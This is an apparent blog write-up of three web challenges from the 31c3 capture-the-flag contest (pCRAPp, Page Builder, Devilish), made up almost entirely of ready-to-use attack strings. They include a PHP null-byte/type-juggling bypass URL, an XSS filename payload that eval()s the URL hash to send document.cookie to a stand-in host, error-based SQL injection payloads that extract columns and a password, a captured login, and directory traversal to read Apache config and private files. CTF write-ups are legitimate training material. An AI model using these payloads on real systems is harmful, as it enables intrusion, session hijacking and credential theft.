31 December 2014

31c3 CTF: WEB Tasks Quick Writeup

PHP is nasty crappy sometimes, just pwn it
http://188.40.18.69/


These guys have ripped off our designs and using them in their web pages builder, we'd Haxx them, dont worry we'll give you decent points for it
http://188.40.18.76/


It's some devilish community public portal, we're pretty sure there's something else out there, a private portal maby, we'd like to know the secret behind it
http://188.40.18.70/






pCRAPp

http://188.40.18.69/pCRAPp.php?a={%22a1%22:[0],%22a2%22:[[0],0,0,0,0]}&b=01&c[]=&c[][]=&d=%0 031c3
remove space in the nullbyte



Page Builder

XSS in filename along with a made up PHP Error

http://188.40.18.76/output/04aa5e2122da4f9583ff294841f2163b4c4223a3/<img src=f onerror=eval(window.location.hash.substring(1))>.php#window.location=http://xx/?f=+document.cookie;
send it to admin you get flag


Devilish

POC:
/PROFILE/56\/||(extractvalue(1,concat(0x7e,(select(1)from(users)limit%0D0,1))))--%0D-

GET COLUMNS:
/PROFILE/56%5C/%0D||%28extractvalue%281,concat%280x7e,%28select%281%29from%28%28SELECT*FROM%0Dusers%0DJOIN%0Dusers%0Db%0DUSING%28id_user,Us3rN4m3,Em4iL4dR3Szz,S4cR3dT3xT0Fm3,MyPh0N3NumB3RHAHA,Addr3Zz0F_tHi5_D3wD,CHAR_LOL%29%29a%29limit%0D0,1%29%29%29%29--%0D-

GET PASSWORD:
/PROFILE/56\/||(extractvalue(1,concat(0x7e,(select(P4sWW0rD_0F_M3_WTF)from(users)limit%0d0,1))))--%0d-
/PROFILE/56\/||(extractvalue(1,concat(0x7e,(select(reverse(P4sWW0rD_0F_M3_WTF))from(users)limit%0D0,1))))--%0D-

LOGIN:
KiTTyKiTTy:sd654egezjniufsdqc89q7d65azd123wxcbqyuslkdz65756sd


GET LOCAL WEBSITE:
http://188.40.18.70/ACCESS?action=browse&dir=../../../../../etc/apache2/sites-enabled
you can see devilish.local.conf

DEVILISH.LOCAL FILES:
http://188.40.18.70/ACCESS?action=browse&dir=../../../../../home/devilish.local


GET SOME SOURCES
http://188.40.18.70/__WebSiteFuckingPrivateContentNotForPublic666/LOGIN_HEAD
http://devilish.local/__WebSiteFuckingPrivateContentNotForPublic666+666/LOGIN_HEAD


LOGIN
user=KiTTyKiTTy&pass=sd654egezjniufsdqc89q7d65azd123wxcbqyuslkdz65756sd&is_ExclusiveMember=1

SET PHPSESSID ON devilish.local same as the public one after that login

refresh http://devilish.local and get your flag

No comments:

Post a Comment